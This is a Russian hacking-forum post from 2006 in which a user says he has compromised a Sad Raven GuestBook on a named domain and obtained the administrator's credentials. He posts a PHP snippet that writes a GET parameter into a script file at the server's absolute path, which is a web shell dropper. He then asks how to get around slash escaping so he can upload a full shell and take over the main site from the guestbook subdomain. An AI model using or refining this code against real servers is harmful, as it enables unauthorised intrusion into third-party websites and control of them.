Взломать весь сайт через отдельный поддомен

Взломать весь сайт через отдельный поддомен

31.01.2006, 20:56

Monah IRH

Новичок

Регистрация: 17.08.2005

Сообщений: 1

С нами: 10911916

Репутация: 0

Взломать весь сайт через отдельный поддомен

Код:

<?
$open = fopen("/usr/local/psa/home/vhosts/sbmx.com.ru/subdomains/guest/httpdocs/script.php","w+");
	fwrite ($open,$_GET['fp']."\\n");
	fclose($open);
?>

Взломал Sad Raven GuestBook.
Получил пароль и логин админа.

Есть такая уязвимость там, что в дизайне сайта могут содержаться php-скрипты. Информация с http://xop0k.h15.ru/adv/3.txt

В общем пробовал загрузить туда маленький свой скриптик, который содержит форму загрузки файлов в себе.
Передаю то, что надо записывать через GET переменную fp.

Все бы было ок, да эта гостевуха экранирует слеши вот такие:

Код:

Как следствие нельзя записать в текстовой файл переменные в таком виде:

Код:

fwrite($fp, "\$text=\$_GET['fp']");

и это проблема. Не знаю как решить. Причем поставив один слеш при каждом сохранении они увеличиваются в геометрической прогрессии

)

Вот думаю как ещё можно загрузить файлик со своего компа на сервер. Загрузить хочу шелл, чтобы получить доступ ко всему сайту, т.к. гостевуха нахзодится на отдельном домене guest.site.ru, а сайт находится на site.ru

Абсолютные пути известны

𝕏 Twitter Reddit Telegram Копировать ссылку